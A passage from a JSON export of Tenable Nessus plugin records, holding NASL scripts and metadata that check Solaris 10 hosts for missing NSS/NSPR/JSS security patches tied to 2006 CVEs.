value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-36\");\n script_summary(english:\"Check for patch 119214-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119214-36\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-36 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-36\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.21: NSPR 4.11 / NSS 3.21 /.\nDate this patch was last updated by Sun : Mar/22/16", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-33", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-33.NASL", "href": "https://www.tenable.com/plugins/nessus/107312", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107312);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-33\");\n script_summary(english:\"Check for patch 119213-33\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119213-33\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.21: NSPR 4.11 / NSS 3.21 /.\nDate this patch was last updated by Sun : Mar/22/16\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-33\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-33 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-33\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-36", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-36.NASL", "href": "https://www.tenable.com/plugins/nessus/107313", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107313);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-36\");\n script_summary(english:\"Check for patch 119213-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119213-36\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.30.2: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/09/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-36 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-36\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:36", "description": "NSS_NSPR_JSS 3.17.2_x86: NSPR 4.10.7 / NSS.\nDate this patch was last updated by Sun : Feb/19/15", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119214-31", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-31.NASL", "href": "https://www.tenable.com/plugins/nessus/107813", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107813);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-31\");\n script_summary(english:\"Check for patch 119214-31\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119214-31\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.17.2_x86: NSPR 4.10.7 / NSS.\nDate this patch was last updated by Sun : Feb/19/15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-31 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-31\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}]}
